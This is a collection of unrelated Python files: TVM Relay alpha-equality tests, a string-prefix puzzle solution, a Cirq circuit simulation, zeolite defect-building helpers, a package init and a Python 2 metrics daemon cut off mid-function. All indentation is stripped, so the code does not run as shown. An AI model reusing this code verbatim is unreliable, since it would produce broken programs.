assert tr == same
assert tr != diff_func
assert tr != diff_order
assert tr != diff_args
assert tr != diff_attr
assert tr == same_attr
assert tr != bigger
assert bigger != diff_num_inputs
def test_type_call_alpha_equal():
h1 = relay.GlobalTypeVar("h1")
h2 = relay.GlobalTypeVar("h2")
t1 = relay.TensorType((1, 2), "float32")
t2 = relay.TensorType((1, 2, 3), "float32")
t3 = relay.TensorType((1, 2, 3, 4), "float32")
t4 = relay.TensorType((), "float32")
tc = relay.TypeCall(h1, [t1, t2, t3])
same = relay.TypeCall(h1, [t1, t2, t3])
different_func = relay.TypeCall(h2, [t1, t2, t3])
different_arg = relay.TypeCall(h1, [t1, t2, t4])
fewer_args = relay.TypeCall(h1, [t1, t2])
more_args = relay.TypeCall(h1, [t1, t2, t3, t4])
different_order_args = relay.TypeCall(h1, [t3, t2, t1])
assert tc == same
assert tc != different_func
assert tc != different_arg
assert tc != fewer_args
assert tc != more_args
assert tc != different_order_args
def test_constant_alpha_equal():
x = relay.const(1)
y = relay.const(2)
assert alpha_equal(x, x)
assert not alpha_equal(x, y)
assert alpha_equal(x, relay.const(1))
def test_var_alpha_equal():
v1 = relay.Var("v1")
v2 = relay.Var("v2")
# normally only pointer equality
assert alpha_equal(v1, v1)
assert not alpha_equal(v1, v2)
# let node allows for setting the eq_map
l1 = relay.Let(v1, relay.const(1), v1)
l2 = relay.Let(v2, relay.const(1), v2)
l3 = relay.Let(v1, relay.const(1), v2)
assert alpha_equal(l1, l2)
assert not alpha_equal(l1, l3)
# type annotations
tt1 = relay.TensorType([], "int32")
tt2 = relay.TensorType([], "int32")
tt3 = relay.TensorType([], "int64")
v3 = relay.Var("v3", tt1)
v4 = relay.Var("v4", tt2)
v5 = relay.Var("v5", tt3)
l4 = relay.Let(v3, relay.const(1), v3)
l5 = relay.Let(v4, relay.const(1), v4)
l6 = relay.Let(v5, relay.const(1), v5)
# same annotations
assert alpha_equal(l4, l5)
# different annotations
assert not alpha_equal(l4, l6)
# one null annotation
assert not alpha_equal(l1, l4)
def test_global_var_alpha_equal():
v1 = relay.GlobalVar("v1")
v2 = relay.GlobalVar("v2")
# only pointer equality suffices (smoke test)
assert alpha_equal(v1, v1)
assert not alpha_equal(v1, v2)
def test_tuple_alpha_equal():
v0 = relay.Var("v0")
v1 = relay.Var("v1")
v2 = relay.Var("v2")
# unit value is a valid tuple
assert alpha_equal(relay.Tuple([]), relay.Tuple([]))
tup = relay.Tuple([v0, relay.const(2), relay.const(3), relay.Tuple([relay.const(4)])])
same = relay.Tuple([v0, relay.const(2), relay.const(3), relay.Tuple([relay.const(4)])])
assert alpha_equal(tup, same)
# use the eq_map
let_tup = relay.Let(v1, tup, v1)
let_mapped = relay.Let(v2, relay.Tuple([v0, relay.const(2), relay.const(3),
relay.Tuple([relay.const(4)])]),
v2)
assert alpha_equal(let_tup, let_mapped)
more_fields = relay.Tuple([v1, relay.const(2), relay.const(3), relay.Tuple([relay.const(4)]), v2])
assert not alpha_equal(tup, more_fields)
fewer_fields = relay.Tuple([v1, relay.const(2), relay.const(3)])
assert not alpha_equal(tup, fewer_fields)
different_end = relay.Tuple([v1, relay.const(2), relay.const(3),
relay.Tuple([relay.const(5)])])
assert not alpha_equal(tup, different_end)
different_start = relay.Tuple([v2, relay.const(2), relay.const(3),
relay.Tuple([relay.const(4)])])
assert not alpha_equal(tup, different_start)
longer_at_end = relay.Tuple([v1, relay.const(2), relay.const(3),
relay.Tuple([relay.const(4), relay.const(5)])])
assert not alpha_equal(tup, longer_at_end)
def test_tuple_get_item_alpha_equal():
x = relay.Var('x')
y = relay.Var('y')
assert not alpha_equal(relay.TupleGetItem(x, 1), relay.TupleGetItem(y, 1))
assert not alpha_equal(relay.TupleGetItem(x, 1), relay.TupleGetItem(x, 2))
assert alpha_equal(relay.TupleGetItem(x, 1), relay.TupleGetItem(x, 1))
def test_function_attr():
x0 = relay.var('x0', shape=(10, 10))
w00 = relay.var('w00', shape=(10, 10))
w01 = relay.var('w01', shape=(10, 10))
w02 = relay.var('w02', shape=(10, 10))
z00 = relay.add(x0, w00)
p00 = relay.subtract(z00, w01)
q00 = relay.multiply(p00, w02)
func0 = relay.Function([x0, w00, w01, w02], q00)
func0 = func0.set_attribute("FuncName", tvm.tir.StringImm("a"))
x1 = relay.var('x1', shape=(10, 10))
w10 = relay.var('w10', shape=(10, 10))
w11 = relay.var('w11', shape=(10, 10))
w12 = relay.var('w12', shape=(10, 10))
z10 = relay.add(x1, w10)
p10 = relay.subtract(z10, w11)
q10 = relay.multiply(p10, w12)
func1 = relay.Function([x1, w10, w11, w12], q10)
func1 = func1.set_attribute("FuncName", tvm.tir.StringImm("b"))
assert not alpha_equal(func0, func1)
def test_function_alpha_equal():
tt1 = relay.TensorType((1, 2, 3), "float32")
tt2 = relay.TensorType((4, 5, 6), "int8")
tt3 = relay.TupleType([tt1, tt2])
v1 = relay.Var("v1", tt1)
v2 = relay.Var("v2", tt2)
v3 = relay.Var("v3", tt3)
v4 = relay.Var("v4", tt2)
vret = relay.Constant(tvm.nd.array(np.ones(1)))
tp1 = relay.TypeVar("tp1", relay.TypeKind.Type)
tp2 = relay.TypeVar("tp2", relay.TypeKind.Type)
tp3 = relay.TypeVar("tp3", relay.TypeKind.ShapeVar)
tp4 = relay.TypeVar("tp4", relay.TypeKind.ShapeVar)
basic_args = [relay.Var("v3", tt1), relay.Var("v4", tt2)]
basic_tps = [tp1, tp2]
func = relay.Function([v1, v2], v1,
tt2, basic_tps)
mapped = relay.Function(basic_args, basic_args[0], tt2, basic_tps)
assert alpha_equal(func, mapped)
fewer_params = relay.Function([relay.Var("v4", tt2)], v4, tt2, basic_tps)
assert not alpha_equal(func, fewer_params)
more_params = relay.Function([relay.Var("v3", tt1),
relay.Var("v4", tt2),
relay.Var("v2", tt2)], v4, tt2, basic_tps)
assert not alpha_equal(func, more_params)
params_unordered = relay.Function([v2, v1], v1,
tt2, basic_tps)
assert not alpha_equal(func, params_unordered)
params_mismatch = relay.Function([v1, v3], v1,
tt2, basic_tps)
assert not alpha_equal(func, params_mismatch)
# also would not typecheck
ret_type_mismatch = relay.Function(basic_args, v4, tt1, basic_tps)
assert not alpha_equal(func, ret_type_mismatch)
# also mis-typed
different_body = relay.Function(basic_args, v3, tt2, basic_tps)
assert not alpha_equal(func, different_body)
fewer_type_params = relay.Function(basic_args, v4, tt2, [tp1])
assert not alpha_equal(func, fewer_type_params)
more_type_params = relay.Function(basic_args, v4, tt2, [tp1, tp2, tp3])
assert not alpha_equal(func, more_type_params)
type_params_unordered = relay.Function(basic_args, v4, tt2, [tp2, tp1])
assert not alpha_equal(func, type_params_unordered)
different_type_params = relay.Function(basic_args, v4, tt2, [tp3, tp4])
assert not alpha_equal(func, different_type_params)
# a well-typed example that also differs in body, ret type, and type params
tupled_example = relay.Function(basic_args, relay.Tuple([v3, v4]), tt3)
assert not alpha_equal(func, tupled_example)
# nullable
no_ret_type = relay.Function(basic_args, v4, None, [tp1, tp2])
# both null
assert alpha_equal(no_ret_type, no_ret_type)
# one null
assert not alpha_equal(func, no_ret_type)
assert not alpha_equal(no_ret_type, func)
def test_call_alpha_equal():
v1 = relay.Var("v1")
v2 = relay.Var("v2")
attr1 = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4))
attr1_same = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4))
attr2 = tvm.ir.make_node("attrs.TestAttrs", name="attr", padding=(3,4,4))
tt1 = relay.TensorType((1, 2, 3), "float32")
tt2 = relay.TensorType((), "int8")
basic_args = [relay.const(1), relay.const(2), v2, relay.Tuple([])]
# manually writing out args to ensure that args does not rely on
# pointer equality
call = relay.Call(v1, [relay.const(1), relay.const(2), v2, relay.Tuple([])],
attr1, [tt1])
same = relay.Call(v1, basic_args, attr1, [tt1])
assert alpha_equal(call, same)
different_fn = relay.Call(v2, basic_args, attr1, [tt1])
assert not alpha_equal(call, different_fn)
fewer_args = relay.Call(v1, [relay.const(1), relay.const(2), v2], attr1, [tt1])
assert not alpha_equal(call, fewer_args)
reordered_args = relay.Call(v1, [relay.const(2), relay.const(1),
relay.Tuple([]), v2], attr1, [tt1])
assert not alpha_equal(call, reordered_args)
different_args = relay.Call(v1, [relay.const(1), relay.const(2), relay.const(3)],
attr1, [tt1])
assert not alpha_equal(call, different_args)
more_args = relay.Call(v1, [relay.const(1), relay.const(2), v2, relay.Tuple([]),
relay.const(3), relay.const(4)], attr1, [tt1])
assert not alpha_equal(call, more_args)
different_attrs = relay.Call(v1, basic_args, attr2, [tt1])
assert not alpha_equal(call, different_attrs)
same_attrs = relay.Call(v1, basic_args, attr1_same, [tt1])
assert alpha_equal(call, same_attrs)
no_type_args = relay.Call(v1, basic_args, attr1)
assert not alpha_equal(call, no_type_args)
more_type_args = relay.Call(v1, basic_args, attr1, [tt1, tt2])
assert not alpha_equal(call, more_type_args)
different_type_arg = relay.Call(v1, basic_args, attr1, [tt2])
assert not alpha_equal(call, different_type_arg)
def test_let_alpha_equal():
tt1 = relay.TensorType((), "float32")
tt2 = relay.TensorType((), "int8")
v1 = relay.Var("v1")
v1_wtype = relay.Var("v1", tt1)
v2 = relay.Var("v2")
v3 = relay.Var("v3")
let = relay.Let(v1, relay.const(2), v1)
mapped = relay.Let(v2, relay.const(2), v2)
assert alpha_equal(let, mapped)
mismatched_var = relay.Let(v2, relay.const(2), v3)
assert not alpha_equal(let, mismatched_var)
different_value = relay.Let(v2, relay.const(3), v2)
assert not alpha_equal(let, different_value)
different_body = relay.Let(v2, relay.const(3), relay.const(12))
assert not alpha_equal(let, different_body)
# specified types must match
let_with_type = relay.Let(v1_wtype, relay.const(2), v1_wtype)
same_type = relay.Let(v1_wtype, relay.const(2), v1_wtype)
assert alpha_equal(let_with_type, same_type)
assert not alpha_equal(let, let_with_type)
v2 = relay.Var("v1", tt2)
different_type = relay.Let(v2, relay.const(2), v2)
assert not alpha_equal(let_with_type, different_type)
def test_if_alpha_equal():
v1 = relay.Var("v1")
v2 = relay.Var("v2")
if_sample = relay.If(v1, relay.const(1), relay.Tuple([relay.const(2), relay.const(3)]))
same = relay.If(v1, relay.const(1), relay.Tuple([relay.const(2), relay.const(3)]))
assert alpha_equal(if_sample, same)
different_cond = relay.If(v2, relay.const(1), relay.Tuple([relay.const(2), relay.const(3)]))
assert not alpha_equal(if_sample, different_cond)
different_true = relay.If(v1, relay.const(2), relay.Tuple([relay.const(2), relay.const(3)]))
assert not alpha_equal(if_sample, different_true)
different_false = relay.If(v1, relay.const(1), relay.Tuple([]))
assert not alpha_equal(if_sample, different_false)
def test_constructor_alpha_equal():
# smoke test: it should be pointer equality
mod = tvm.IRModule()
p = relay.prelude.Prelude(mod)
assert alpha_equal(p.nil, p.nil)
assert alpha_equal(p.cons, p.cons)
assert not alpha_equal(p.nil, p.cons)
def test_match_alpha_equal():
mod = tvm.IRModule()
p = relay.prelude.Prelude(mod)
x = relay.Var('x')
y = relay.Var('y')
nil_case = relay.Clause(relay.PatternConstructor(p.nil), p.nil())
cons_case = relay.Clause(relay.PatternConstructor(p.cons,
[relay.PatternVar(x),
relay.PatternVar(y)]),
p.cons(x, y))
z = relay.Var('z')
a = relay.Var('a')
equivalent_cons = relay.Clause(relay.PatternConstructor(p.cons,
[relay.PatternVar(z),
relay.PatternVar(a)]),
p.cons(z, a))
data = p.cons(relay.const(1), p.cons(relay.const(2), p.nil()))
match = relay.Match(data, [nil_case, cons_case])
equivalent = relay.Match(data, [nil_case, equivalent_cons])
empty = relay.Match(data, [])
no_cons = relay.Match(data, [nil_case])
no_nil = relay.Match(data, [cons_case])
different_data = relay.Match(p.nil(), [nil_case, cons_case])
different_order = relay.Match(data, [cons_case, nil_case])
different_nil = relay.Match(data, [
relay.Clause(relay.PatternConstructor(p.nil), p.cons(p.nil(), p.nil())),
cons_case
])
different_cons = relay.Match(data, [
nil_case,
relay.Clause(relay.PatternConstructor(p.cons,
[relay.PatternWildcard(),
relay.PatternWildcard()]),
p.nil())
])
another_case = relay.Match(data, [
nil_case,
cons_case,
relay.Clause(relay.PatternWildcard(), p.nil())
])
wrong_constructors = relay.Match(data, [
relay.Clause(relay.PatternConstructor(p.none), p.nil()),
relay.Clause(relay.PatternConstructor(p.some, [relay.PatternVar(x)]),
p.cons(x, p.nil()))
])
assert alpha_equal(match, match)
assert alpha_equal(match, equivalent)
assert not alpha_equal(match, no_cons)
assert not alpha_equal(match, no_nil)
assert not alpha_equal(match, empty)
assert not alpha_equal(match, different_data)
assert not alpha_equal(match, different_order)
assert not alpha_equal(match, different_nil)
assert not alpha_equal(match, different_cons)
assert not alpha_equal(match, another_case)
assert not alpha_equal(match, wrong_constructors)
def test_op_alpha_equal():
# only checks names
op1 = relay.op.get("add")
op2 = relay.op.get("add")
assert alpha_equal(op1, op2)
op3 = relay.op.get("take")
assert not alpha_equal(op1, op3)
def test_graph_equal():
x = relay.var("x")
y0 = relay.add(x, x)
z0 = relay.add(y0, y0)
y1 = relay.add(x, x)
z1 = relay.add(y1, y1)
z3 = relay.add(relay.add(x, x), relay.add(x, x))
assert alpha_equal(z0, z1)
assert alpha_equal(z0, z1)
# z3's dataflow format is different from z0
# z0 is computed from a common y0 node
# Relay views them as different programs
# Check the difference in the text format.
assert not alpha_equal(z0, z3)
def test_hash_unequal():
x1 = relay.var("x1", shape=(10, 10), dtype="float32")
y1 = relay.var("y1", shape=(10, 10), dtype="float32")
func1 = relay.Function([x1, y1], relay.add(x1, y1))
# func2 is exactly same structure with same variables shapes and dtypes
x2 = relay.var("x2", shape=(10, 10), dtype="float32")
y2 = relay.var("y2", shape=(10, 10), dtype="float32")
func2 = relay.Function([x2, y2], relay.add(x2, y2))
assert analysis.structural_hash(func1) == analysis.structural_hash(func2)
# func3 is same as func1 but with different var shapes
x3 = relay.var("x3", shape=(20, 10), dtype="float32")
y3 = relay.var("y3", shape=(20, 10), dtype="float32")
func3 = relay.Function([x3, y3], relay.add(x3, y3))
assert not analysis.structural_hash(func1) == analysis.structural_hash(func3)
def test_tuple_match():
a = relay.Var("a")
b = relay.Var("b")
clause = relay.Clause(relay.PatternTuple([relay.PatternVar(a), relay.PatternVar(b)]), a + b)
x = relay.Match(relay.Tuple([relay.const(1), relay.const(1)]), [clause])
a = relay.Var("a")
b = relay.Var("b")
clause = relay.Clause(relay.PatternTuple([relay.PatternVar(a), relay.PatternVar(b)]), a + b)
y = relay.Match(relay.Tuple([relay.const(1), relay.const(1)]), [clause])
assert analysis.alpha_equal(x, y)
assert analysis.structural_hash(x) == analysis.structural_hash(y)
def test_fn_attribute():
# create function that performs add
a = relay.var('a', shape=(10, 10))
b = relay.var('b', shape=(10, 10))
add = relay.add(a, b)
add_fn = relay.Function([a, b], add)
add_fn = run_opt_pass(add_fn, relay.transform.InferType())
# create function that performs add with test attribute
c = relay.var('c', shape=(10, 10))
d = relay.var('d', shape=(10, 10))
add_1 = relay.add(c, d)
add_1_fn = relay.Function([c, d], add_1)
add_1_fn = add_1_fn.set_attribute("TestAttribute", tvm.tir.StringImm("test"))
add_1_fn = run_opt_pass(add_1_fn, relay.transform.InferType())
assert not relay.analysis.alpha_equal(add_1_fn, add_fn)
assert not relay.analysis.alpha_equal(add_fn, add_1_fn)
if __name__ == "__main__":
test_tensor_type_alpha_equal()
test_incomplete_type_alpha_equal()
test_constant_alpha_equal()
test_func_type_alpha_equal()
test_tuple_type_alpha_equal()
test_type_relation_alpha_equal()
test_type_call_alpha_equal()
test_type_param_alpha_equal()
test_tuple_match()
test_global_var_alpha_equal()
test_tuple_alpha_equal()
test_tuple_get_item_alpha_equal()
test_function_alpha_equal()
test_function_attr()
test_call_alpha_equal()
test_let_alpha_equal()
test_if_alpha_equal()
test_constructor_alpha_equal()
test_match_alpha_equal()
test_op_alpha_equal()
test_var_alpha_equal()
test_graph_equal()
test_hash_unequal()
test_fn_attribute()
|
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
s = read().rstrip().decode()
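# Descriptive note (inferred from the loop below): scan even-length proper
# prefixes of s from longest to shortest and print the length of the first
# (i.e. longest) prefix whose first half equals its second half.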
for check in range(len(s) - 2, -1, -2):
if s[check // 2:check] == s[:check // 2]:
print(check)
exit()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=74
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[2])) # number=38
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=39
c.append(cirq.H.on(input_qubit[2])) # number=40
c.append(cirq.H.on(input_qubit[2])) # number=59
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=60
c.append(cirq.H.on(input_qubit[2])) # number=61
c.append(cirq.H.on(input_qubit[2])) # number=42
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=43
c.append(cirq.H.on(input_qubit[2])) # number=44
c.append(cirq.H.on(input_qubit[2])) # number=48
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=49
c.append(cirq.H.on(input_qubit[2])) # number=50
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=54
c.append(cirq.X.on(input_qubit[2])) # number=55
c.append(cirq.H.on(input_qubit[2])) # number=67
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=68
c.append(cirq.H.on(input_qubit[2])) # number=69
c.append(cirq.H.on(input_qubit[2])) # number=64
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=65
c.append(cirq.H.on(input_qubit[2])) # number=66
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=37
c.append(cirq.H.on(input_qubit[2])) # number=51
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=52
c.append(cirq.H.on(input_qubit[2])) # number=53
c.append(cirq.H.on(input_qubit[2])) # number=25
c.append(cirq.CZ.on(input_qubit[0],input_qubit[2])) # number=26
c.append(cirq.H.on(input_qubit[2])) # number=27
c.append(cirq.H.on(input_qubit[1])) # number=7
c.append(cirq.CZ.on(input_qubit[2],input_qubit[1])) # number=8
c.append(cirq.rx(0.17592918860102857).on(input_qubit[2])) # number=34
c.append(cirq.rx(-0.3989822670059037).on(input_qubit[1])) # number=30
c.append(cirq.H.on(input_qubit[1])) # number=9
c.append(cirq.H.on(input_qubit[1])) # number=18
c.append(cirq.rx(2.3310617489636263).on(input_qubit[2])) # number=58
c.append(cirq.CZ.on(input_qubit[2],input_qubit[1])) # number=19
c.append(cirq.H.on(input_qubit[1])) # number=20
c.append(cirq.X.on(input_qubit[1])) # number=62
c.append(cirq.Y.on(input_qubit[1])) # number=14
c.append(cirq.H.on(input_qubit[1])) # number=22
c.append(cirq.CZ.on(input_qubit[2],input_qubit[1])) # number=23
c.append(cirq.rx(-0.9173450548482197).on(input_qubit[1])) # number=57
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[1])) # number=63
c.append(cirq.H.on(input_qubit[1])) # number=24
c.append(cirq.Z.on(input_qubit[2])) # number=3
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[1])) # number=70
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=71
c.append(cirq.Z.on(input_qubit[1])) # number=72
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=73
c.append(cirq.X.on(input_qubit[1])) # number=17
c.append(cirq.Y.on(input_qubit[2])) # number=5
c.append(cirq.X.on(input_qubit[2])) # number=21
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=15
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=16
c.append(cirq.X.on(input_qubit[2])) # number=28
c.append(cirq.X.on(input_qubit[2])) # number=29
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq372.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
|
from ase.io import read, write
from ase import Atoms
from maze import Zeotype, OpenDefect, ImperfectZeotype
import os
from ase.visualize import view
from pathlib import Path
from collections import defaultdict
from typing import List
import numpy as np
# %%
def defect_maker(cif_dir, zeolite_code, output_dir, savefiles=True):
zeolite = Zeotype.build_from_cif_with_labels(cif_dir)
open_defect = OpenDefect(zeolite)
unique_t_site_indices = {}
for site_name, value in zeolite._site_to_atom_indices.items():
if 'T' in site_name:
unique_t_site_indices[site_name] = value[1]
# build dictionary of open defects
unique_t_site_to_od = defaultdict(list)
for site_name, t_site in unique_t_site_indices.items():
for o_index in open_defect.neighbor_list.get_neighbors(t_site)[0]:
for si_index in open_defect.neighbor_list.get_neighbors(o_index)[0]:
if si_index == t_site:
continue
pos = open_defect.get_positions()[si_index]
new_od = open_defect.delete_atoms([si_index]).cap_atoms()
unique_t_site_to_od[site_name].append(new_od)
# save T sites
if savefiles:  # only write output files when requested
for site_name, od_list in unique_t_site_to_od.items():
output_dir2 = os.path.join(output_dir, zeolite_code, site_name)
Path(output_dir2).mkdir(parents=True, exist_ok=True)
for index, od in enumerate(od_list):
output_filename = zeolite_code + '_' + site_name + '_' + str(index) + '.traj'
my_path = os.path.join(output_dir2, output_filename)
write(my_path, od)
return unique_t_site_to_od  # dictionary mapping T-site name -> list of open defects
# helper functions for second defect function
def find_removed_atoms(iz: ImperfectZeotype) -> List[int]:
"""
Finds the atoms removed from the iz by comparing it with parent MAZE-sim
:param iz: imperfect MAZE-sim to check for missing atoms
:return: list of indices of missing atoms (using parent indexing)
"""
missing_list = []
for atom in iz.parent_zeotype:
value = iz.index_mapper.get_index(iz.parent_zeotype.name, iz.name, atom.index)
if value is None:
missing_list.append(atom.index)
return missing_list
def find_neighbor_si(z: Zeotype, first_si_index: int):
"""
Finds the first neighboring Si
:param z: the MAZE-sim object
:param first_si_index: the Si index to find a neighboring Si for
:return: the first neighboring si index
"""
z.update_nl()
for o_index in z.neighbor_list.get_neighbors(first_si_index)[0]:
for si_index in z.neighbor_list.get_neighbors(o_index)[0]:
if si_index == first_si_index:
continue
return si_index
def find_index_common_oxygen(iz, site_1: int, site_2: int) -> int:
"""
Finds a common oxygen, if it exists, between two T sites
:param iz: imperfect MAZE-sim (or subclass) containing T sites
:param site_1: index of T site 1
:param site_2: index of T site 2
:return: the index of the shared oxygen atom
"""
iz.update_nl()
nl1 = iz.neighbor_list.get_neighbors(site_1)[0]
nl2 = iz.neighbor_list.get_neighbors(site_2)[0]
# find common oxygen
for i in nl1:
if i in nl2:
if iz[i].symbol == 'O':
return i
assert False, 'No middle oxygen found!!'
def remove_two_T_sites(iz, site_1: int, site_2: int) -> ImperfectZeotype:
"""
Removes two T sites that are adjacent to each other
:param iz: Imperfect MAZE-sim with two T sites
:param site_1: the index of the first site to remove
:param site_2: the index of the second site to remove
:return: the ImperfectZeotype with both T sites and their shared oxygen removed
"""
indices_to_remove = [site_1, site_2, find_index_common_oxygen(iz, site_1, site_2)]
return iz.delete_atoms(indices_to_remove)
def second_defect(od_dict, T_site_str, list_pos, cif_name, out_path, savefile: bool =True):
"""
Second defect creator
:param od_dict: dictionary of open defects (this is to allow it to integrate with the other code better)
:param T_site_str: The key for the open defects dictionary
:param list_pos: The position in the list of od_dict[T_site_str]
:param cif_name: the name of the cif file used to build the zeolite
:param out_path: the output path
:param savefile: bool if a file should be saved or not
:return: an open defect with an additional adjacent site removed
"""
od = od_dict[T_site_str][list_pos] # get specific open defect
complete_od = OpenDefect(od.parent_zeotype) # create an opendefect object without the removed index
removed_atom_index = find_removed_atoms(od)[0]
neighbor_si_index = find_neighbor_si(complete_od, removed_atom_index)
new_od = remove_two_T_sites(complete_od, removed_atom_index, neighbor_si_index).cap_atoms()
my_path = os.path.join(out_path, cif_name + '_' + str(neighbor_si_index) + '.traj')
if savefile:
write(my_path, new_od)
return new_od
# .add_atoms(Atoms('Ir', positions=[pos]), 'Ir')
# %%
# %%
def insert_HM(cif_dir, out_path, cif_name, si_index):
atoms = read(cif_dir + str(si_index) + '.traj', '-1')
zeolite = Zeotype(atoms)
open_defect = OpenDefect(zeolite)
atoms_H = [a.index for a in open_defect if a.symbol in ['H']]
pos_H = open_defect.get_positions()[atoms_H]
cell_dim = atoms.get_cell_lengths_and_angles()[0:3]
for row in pos_H:
for index, item in enumerate(row):
if item >= cell_dim[index]:
item -= cell_dim[index]
row[index] = item
elif item < 0:
item += cell_dim[index]
row[index] = item
else:
continue
pos = np.mean(pos_H, axis=0)
new_od = open_defect.add_atoms(Atoms('Ir', positions=[pos]), 'Ir')
# my_path = os.path.join(out_path, cif_name + '_' + str(si_index) + '_Ir.traj')
# write(my_path, new_od)
return np.mean(pos)
def insert_HM_2(open_defect, si_index):
atoms_types, _ = open_defect.count_elements
atoms_H = atoms_types['H']
pos_H = open_defect.get_positions()[atoms_H]
cell_dim = open_defect.get_cell_lengths_and_angles()[0:3]
for row in pos_H:
for index, item in enumerate(row):
if item >= cell_dim[index]:
item -= cell_dim[index]
row[index] = item
elif item < 0:
item += cell_dim[index]
row[index] = item
else:
continue
pos = np.mean(pos_H, axis=0)
new_od = open_defect.add_atoms(Atoms('Ir', positions=[pos]), 'Ir')
return np.mean(pos)
if __name__ == "__main__":
#defect_maker('/Users/jiaweiguo/Desktop/0125Proposal/BEA.cif', 'BEA', '/Users/jiaweiguo/Desktop/0125Proposal')
od_dict = defect_maker('/data/BEA.cif', 'BEA', '//data/test_output',
savefiles=False)
my_od = second_defect(od_dict, 'T3', 3, 'BEA', '//data/test_output', savefile=False)
view(my_od)
# second_defect(cif_dir, out_path, 'BEA_T1_3', 189)
# second_defect(cif_dir, out_path, 'BEA_T1_3', 141)
# second_defect(cif_dir, out_path, 'BEA_T1_3', 177)
# cif_dir = '/Users/jiaweiguo/Desktop/0125Proposal/BEA/T1/BEA_T1_3.traj'
# out_path = '/Users/jiaweiguo/Desktop/0125Proposal/BEA/T1/'
# cif_dir = '/Users/jiaweiguo/Desktop/0125Proposal/BEA/T1/BEA_T1_3_'
# out_path = '/Users/jiaweiguo/Desktop/0125Proposal/BEA/T1/'
# insert_HM(cif_dir, out_path, 'BEA_T1_3', 141)
# insert_HM(cif_dir, out_path, 'BEA_T1_3', 189)
# insert_HM(cif_dir, out_path, 'BEA_T1_3', 177)
#
|
__version__ = '0.0.3'
from . import jws, command
load_jws = jws.load_jws
Jws = jws.Jws
|
#!/usr/bin/env python
import atexit
import ConfigParser
import datetime
import os
import sys
import time
from daemon import runner
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from modules.Models import Base, Metrics, Server, Service
from modules.ServiceStatus import ServiceStatus
class MetricsCollector():
def __init__(self, pid_file, db_path, config_file, poll_interval=60, debug=True):
self.stdin_path = '/dev/null'
if debug:
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.poll_interval = int(poll_interval/3)
else:
self.stdout_path = '/dev/null'
self.stderr_path = '/dev/null'
self.poll_interval = poll_interval
self.pidfile_timeout = 5
self.pidfile_path = pid_file
self.db_path = db_path
self.config_file = config_file
self.db_session = None
self.server = None
self.services = []
atexit.register(self.db_close)
def run(self):
try:
print "creating DB..."
# Initialise object to collect metrics
services_status = ServiceStatus()
# Connect to database
self.db_open(services_status.get_server_hostname())
# Hold off until configuration file created
print "Sleeping until configuration file found (%s)" % self.config_file
while True:
if os.path.isfile(self.config_file):
break
else:
time.sleep(self.poll_interval)
print "Configuration file found, polling.."
# First metrics poll to instantiate system information
while True:
# Poll and store
dt = datetime.datetime.utcnow()
services = self.get_services(self.config_file)
data = services_status.poll_metrics(services)
self.store_status(dt, data)
time.sleep(self.poll_interval)
except Exception, e:
print "Collector error: %s" % e
def db_open(self, hostname='localhost'):
engine = create_engine('sqlite:///'+self.db_path)
Base.metadata.bind = engine
Base.metadata.create_all(engine)
DBSession = sessionmaker(bind=engine)
self.db_session = DBSession()
self.server = Server(hostname=hostname)
self.db_session.add(self.server)
self.db_session.commit()
def db_close(self):
if self.db_session:
self.db_session.close()
def db_rollback(self):
self.db_session.rollback()
def get_services(self, config_file):
services = list()
try:
config = ConfigParser.ConfigParser()
config.read(config_file)
if 'services' in config.sections():
for service in config.items('services'):
name = service[0]
url = service[1]
services.append({'name': name, 'url': url})
return services
except Exception, e:
print "Exception while reading services from configuration: %s" % e
return False
def get_services_last2hours(self):
try:
now = datetime.datetime.utcnow()
last_2_hours = now - datetime.timedelta(hours=2)
self.services = self.db_session.query(Service).filter_by(server=self.server).filter(Service.timestamp >= last_2_hours.strftime('%s')).order_by(Service.id)
except Exception:
print "Error accessing services status"
def store_status(self, date_time, data):
try:
for service in data:
service_status = Metrics(timestamp=date_time.strftime('%s'),
latency=data[service].get('latency', -1),
available=data[service].get('reachable'),
service_name=service)
self.db_session.add(service_status)
self.db_session.commit()
except Exception, e:
print "Error storing services status: %s" % e
finally:
self.db_close()
def is_running(pid_file):
try:
with file(pid_file, 'r') as pf:
pid = int(pf.read().strip())
except IOError:
